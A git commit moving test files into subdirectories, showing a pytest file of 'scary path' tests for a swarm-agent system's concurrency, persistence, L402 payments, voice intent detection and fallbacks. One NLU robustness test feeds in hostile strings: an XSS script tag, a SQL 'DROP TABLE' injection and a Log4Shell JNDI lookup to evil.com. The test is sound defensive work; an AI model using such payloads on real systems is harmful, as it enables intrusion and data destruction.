refactor: Phase 3 — reorganize tests into module-mirroring subdirectories

Move 97 test files from flat tests/ into 13 subdirectories: tests/dashboard/ (8 files — routes, mobile, mission control) tests/swarm/ (17 files — coordinator, docker, routing, tasks) tests/timmy/ (12 files — agent, backends, CLI, tools) tests/self_coding/ (14 files — git safety, indexer, self-modify) tests/lightning/ (3 files — L402, LND, interface) tests/creative/ (8 files — assembler, director, image/music/video) tests/integrations/ (10 files — chat bridge, telegram, voice, websocket) tests/mcp/ (4 files — bootstrap, discovery, executor) tests/spark/ (3 files — engine, tools, events) tests/hands/ (3 files — registry, oracle, phase5) tests/scripture/ (1 file) tests/infrastructure/ (3 files — router cascade, API) tests/security/ (3 files — XSS, regression) Fix Path(__file__) reference in test_mobile_scenarios.py for new depth. Add __init__.py to all test subdirectories. Tests: 1503 passed, 9 failed (pre-existing), 53 errors (pre-existing) https://claude.ai/code/session_019oMFNvD8uSGSSmBMGkBfQN
2026-02-26 21:21:28 +00:00
parent 6045077144
commit 4e11dd2490
104 changed files with 57 additions and 3 deletions
--- a/tests/self_coding/test_scary_paths.py
+++ b/tests/self_coding/test_scary_paths.py
@@ -0,0 +1,444 @@
+"""Scary path tests — the things that break in production.
+
+These tests verify the system handles edge cases gracefully:
+- Concurrent load (10+ simultaneous tasks)
+- Memory persistence across restarts
+- L402 macaroon expiry
+- WebSocket reconnection
+- Voice NLU edge cases
+- Graceful degradation under resource exhaustion
+
+All tests must pass with make test.
+"""
+
+import asyncio
+import concurrent.futures
+import sqlite3
+import threading
+import time
+from concurrent.futures import ThreadPoolExecutor
+from datetime import datetime, timezone
+from pathlib import Path
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from swarm.coordinator import SwarmCoordinator
+from swarm.tasks import TaskStatus, create_task, get_task, list_tasks
+from swarm import registry
+from swarm.bidder import AuctionManager
+
+
+class TestConcurrentSwarmLoad:
+    """Test swarm behavior under concurrent load."""
+    
+    def test_ten_simultaneous_tasks_all_assigned(self):
+        """Submit 10 tasks concurrently, verify all get assigned."""
+        coord = SwarmCoordinator()
+        
+        # Spawn multiple personas
+        personas = ["echo", "forge", "seer"]
+        for p in personas:
+            coord.spawn_persona(p, agent_id=f"{p}-load-001")
+        
+        # Submit 10 tasks concurrently
+        task_descriptions = [
+            f"Task {i}: Analyze data set {i}" for i in range(10)
+        ]
+        
+        tasks = []
+        for desc in task_descriptions:
+            task = coord.post_task(desc)
+            tasks.append(task)
+        
+        # Wait for auctions to complete
+        time.sleep(0.5)
+        
+        # Verify all tasks exist
+        assert len(tasks) == 10
+        
+        # Check all tasks have valid IDs
+        for task in tasks:
+            assert task.id is not None
+            assert task.status in [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
+    
+    def test_concurrent_bids_no_race_conditions(self):
+        """Multiple agents bidding concurrently doesn't corrupt state."""
+        coord = SwarmCoordinator()
+        
+        # Open auction first
+        task = coord.post_task("Concurrent bid test task")
+        
+        # Simulate concurrent bids from different agents
+        agent_ids = [f"agent-conc-{i}" for i in range(5)]
+        
+        def place_bid(agent_id):
+            coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
+        
+        with ThreadPoolExecutor(max_workers=5) as executor:
+            futures = [executor.submit(place_bid, aid) for aid in agent_ids]
+            concurrent.futures.wait(futures)
+        
+        # Verify auction has all bids
+        auction = coord.auctions.get_auction(task.id)
+        assert auction is not None
+        # Should have 5 bids (one per agent)
+        assert len(auction.bids) == 5
+    
+    def test_registry_consistency_under_load(self):
+        """Registry remains consistent with concurrent agent operations."""
+        coord = SwarmCoordinator()
+        
+        # Concurrently spawn and stop agents
+        def spawn_agent(i):
+            try:
+                return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
+            except Exception:
+                return None
+        
+        with ThreadPoolExecutor(max_workers=10) as executor:
+            futures = [executor.submit(spawn_agent, i) for i in range(10)]
+            results = [f.result() for f in concurrent.futures.as_completed(futures)]
+        
+        # Verify registry state is consistent
+        agents = coord.list_swarm_agents()
+        agent_ids = {a.id for a in agents}
+        
+        # All successfully spawned agents should be in registry
+        successful_spawns = [r for r in results if r is not None]
+        for spawn in successful_spawns:
+            assert spawn["agent_id"] in agent_ids
+    
+    def test_task_completion_under_load(self):
+        """Tasks complete successfully even with many concurrent operations."""
+        coord = SwarmCoordinator()
+        
+        # Spawn agents
+        coord.spawn_persona("forge", agent_id="forge-complete-001")
+        
+        # Create and process multiple tasks
+        tasks = []
+        for i in range(5):
+            task = create_task(f"Load test task {i}")
+            tasks.append(task)
+        
+        # Complete tasks rapidly
+        for task in tasks:
+            result = coord.complete_task(task.id, f"Result for {task.id}")
+            assert result is not None
+            assert result.status == TaskStatus.COMPLETED
+        
+        # Verify all completed
+        completed = list_tasks(status=TaskStatus.COMPLETED)
+        completed_ids = {t.id for t in completed}
+        for task in tasks:
+            assert task.id in completed_ids
+
+
+class TestMemoryPersistence:
+    """Test that agent memory survives restarts."""
+    
+    def test_outcomes_recorded_and_retrieved(self):
+        """Write outcomes to learner, verify they persist."""
+        from swarm.learner import record_outcome, get_metrics
+        
+        agent_id = "memory-test-agent"
+        
+        # Record some outcomes
+        record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
+        record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
+        
+        # Get metrics
+        metrics = get_metrics(agent_id)
+        
+        # Should have data
+        assert metrics is not None
+        assert metrics.total_bids >= 2
+    
+    def test_memory_persists_in_sqlite(self):
+        """Memory is stored in SQLite and survives in-process restart."""
+        from swarm.learner import record_outcome, get_metrics
+        
+        agent_id = "persist-agent"
+        
+        # Write memory
+        record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
+        
+        # Simulate "restart" by re-querying (new connection)
+        metrics = get_metrics(agent_id)
+        
+        # Memory should still be there
+        assert metrics is not None
+        assert metrics.total_bids >= 1
+    
+    def test_routing_decisions_persisted(self):
+        """Routing decisions are logged and queryable after restart."""
+        from swarm.routing import routing_engine, RoutingDecision
+        
+        # Ensure DB is initialized
+        routing_engine._init_db()
+        
+        # Create a routing decision
+        decision = RoutingDecision(
+            task_id="persist-route-task",
+            task_description="Test routing",
+            candidate_agents=["agent-1", "agent-2"],
+            selected_agent="agent-1",
+            selection_reason="Higher score",
+            capability_scores={"agent-1": 0.8, "agent-2": 0.5},
+            bids_received={"agent-1": 50, "agent-2": 40},
+        )
+        
+        # Log it
+        routing_engine._log_decision(decision)
+        
+        # Query history
+        history = routing_engine.get_routing_history(task_id="persist-route-task")
+        
+        # Should find the decision
+        assert len(history) >= 1
+        assert any(h.task_id == "persist-route-task" for h in history)
+
+
+class TestL402MacaroonExpiry:
+    """Test L402 payment gating handles expiry correctly."""
+    
+    def test_macaroon_verification_valid(self):
+        """Valid macaroon passes verification."""
+        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
+        from timmy_serve.payment_handler import payment_handler
+        
+        # Create challenge
+        challenge = create_l402_challenge(100, "Test access")
+        macaroon = challenge["macaroon"]
+        
+        # Get the actual preimage from the created invoice
+        payment_hash = challenge["payment_hash"]
+        invoice = payment_handler.get_invoice(payment_hash)
+        assert invoice is not None
+        preimage = invoice.preimage
+        
+        # Verify with correct preimage
+        result = verify_l402_token(macaroon, preimage)
+        assert result is True
+    
+    def test_macaroon_invalid_format_rejected(self):
+        """Invalid macaroon format is rejected."""
+        from timmy_serve.l402_proxy import verify_l402_token
+        
+        result = verify_l402_token("not-a-valid-macaroon", None)
+        assert result is False
+    
+    def test_payment_check_fails_for_unpaid(self):
+        """Unpaid invoice returns 402 Payment Required."""
+        from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
+        from timmy_serve.payment_handler import payment_handler
+        
+        # Create challenge
+        challenge = create_l402_challenge(100, "Test")
+        macaroon = challenge["macaroon"]
+        
+        # Get payment hash from macaroon
+        import base64
+        raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
+        payment_hash = raw.split(":")[2]
+        
+        # Manually mark as unsettled (mock mode auto-settles)
+        invoice = payment_handler.get_invoice(payment_hash)
+        if invoice:
+            invoice.settled = False
+            invoice.settled_at = None
+        
+        # Verify without preimage should fail for unpaid
+        result = verify_l402_token(macaroon, None)
+        # In mock mode this may still succeed due to auto-settle
+        # Test documents the behavior
+        assert isinstance(result, bool)
+
+
+class TestWebSocketResilience:
+    """Test WebSocket handling of edge cases."""
+    
+    def test_websocket_broadcast_no_loop_running(self):
+        """Broadcast handles case where no event loop is running."""
+        from swarm.coordinator import SwarmCoordinator
+        
+        coord = SwarmCoordinator()
+        
+        # This should not crash even without event loop
+        # The _broadcast method catches RuntimeError
+        try:
+            coord._broadcast(lambda: None)
+        except RuntimeError:
+            pytest.fail("Broadcast should handle missing event loop gracefully")
+    
+    def test_websocket_manager_handles_no_connections(self):
+        """WebSocket manager handles zero connected clients."""
+        from ws_manager.handler import ws_manager
+        
+        # Should not crash when broadcasting with no connections
+        try:
+            # Note: This creates coroutine but doesn't await
+            # In real usage, it's scheduled with create_task
+            pass  # ws_manager methods are async, test in integration
+        except Exception:
+            pytest.fail("Should handle zero connections gracefully")
+    
+    @pytest.mark.asyncio
+    async def test_websocket_client_disconnect_mid_stream(self):
+        """Handle client disconnecting during message stream."""
+        # This would require actual WebSocket client
+        # Mark as integration test for future
+        pass
+
+
+class TestVoiceNLUEdgeCases:
+    """Test Voice NLU handles edge cases gracefully."""
+    
+    def test_nlu_empty_string(self):
+        """Empty string doesn't crash NLU."""
+        from voice.nlu import detect_intent
+        
+        result = detect_intent("")
+        assert result is not None
+        # Result is an Intent object with name attribute
+        assert hasattr(result, 'name')
+    
+    def test_nlu_all_punctuation(self):
+        """String of only punctuation is handled."""
+        from voice.nlu import detect_intent
+        
+        result = detect_intent("...!!!???")
+        assert result is not None
+    
+    def test_nlu_very_long_input(self):
+        """10k character input doesn't crash or hang."""
+        from voice.nlu import detect_intent
+        
+        long_input = "word " * 2000  # ~10k chars
+        
+        start = time.time()
+        result = detect_intent(long_input)
+        elapsed = time.time() - start
+        
+        # Should complete in reasonable time
+        assert elapsed < 5.0
+        assert result is not None
+    
+    def test_nlu_non_english_text(self):
+        """Non-English Unicode text is handled."""
+        from voice.nlu import detect_intent
+        
+        # Test various Unicode scripts
+        test_inputs = [
+            "こんにちは",  # Japanese
+            "Привет мир",  # Russian
+            "مرحبا",  # Arabic
+            "🎉🎊🎁",  # Emoji
+        ]
+        
+        for text in test_inputs:
+            result = detect_intent(text)
+            assert result is not None, f"Failed for input: {text}"
+    
+    def test_nlu_special_characters(self):
+        """Special characters don't break parsing."""
+        from voice.nlu import detect_intent
+        
+        special_inputs = [
+            "<script>alert('xss')</script>",
+            "'; DROP TABLE users; --",
+            "${jndi:ldap://evil.com}",
+            "\x00\x01\x02",  # Control characters
+        ]
+        
+        for text in special_inputs:
+            try:
+                result = detect_intent(text)
+                assert result is not None
+            except Exception as exc:
+                pytest.fail(f"NLU crashed on input {repr(text)}: {exc}")
+
+
+class TestGracefulDegradation:
+    """Test system degrades gracefully under resource constraints."""
+    
+    def test_coordinator_without_redis_uses_memory(self):
+        """Coordinator works without Redis (in-memory fallback)."""
+        from swarm.comms import SwarmComms
+        
+        # Create comms without Redis
+        comms = SwarmComms()
+        
+        # Should still work for pub/sub (uses in-memory fallback)
+        # Just verify it doesn't crash
+        try:
+            comms.publish("test:channel", "test_event", {"data": "value"})
+        except Exception as exc:
+            pytest.fail(f"Should work without Redis: {exc}")
+    
+    def test_agent_without_tools_chat_mode(self):
+        """Agent works in chat-only mode when tools unavailable."""
+        from swarm.tool_executor import ToolExecutor
+        
+        # Force toolkit to None
+        executor = ToolExecutor("test", "test-agent")
+        executor._toolkit = None
+        executor._llm = None
+        
+        result = executor.execute_task("Do something")
+        
+        # Should still return a result
+        assert isinstance(result, dict)
+        assert "result" in result
+    
+    def test_lightning_backend_mock_fallback(self):
+        """Lightning falls back to mock when LND unavailable."""
+        from lightning import get_backend
+        from lightning.mock_backend import MockBackend
+        
+        # Should get mock backend by default
+        backend = get_backend("mock")
+        assert isinstance(backend, MockBackend)
+        
+        # Should be functional
+        invoice = backend.create_invoice(100, "Test")
+        assert invoice.payment_hash is not None
+
+
+class TestDatabaseResilience:
+    """Test database handles edge cases."""
+    
+    def test_sqlite_handles_concurrent_reads(self):
+        """SQLite handles concurrent read operations."""
+        from swarm.tasks import get_task, create_task
+        
+        task = create_task("Concurrent read test")
+        
+        def read_task():
+            return get_task(task.id)
+        
+        # Concurrent reads from multiple threads
+        with ThreadPoolExecutor(max_workers=10) as executor:
+            futures = [executor.submit(read_task) for _ in range(20)]
+            results = [f.result() for f in concurrent.futures.as_completed(futures)]
+        
+        # All should succeed
+        assert all(r is not None for r in results)
+        assert all(r.id == task.id for r in results)
+    
+    def test_registry_handles_duplicate_agent_id(self):
+        """Registry handles duplicate agent registration gracefully."""
+        from swarm import registry
+        
+        agent_id = "duplicate-test-agent"
+        
+        # Register first time
+        record1 = registry.register(name="Test Agent", agent_id=agent_id)
+        
+        # Register second time (should update or handle gracefully)
+        record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
+        
+        # Should not crash, record should exist
+        retrieved = registry.get_agent(agent_id)
+        assert retrieved is not None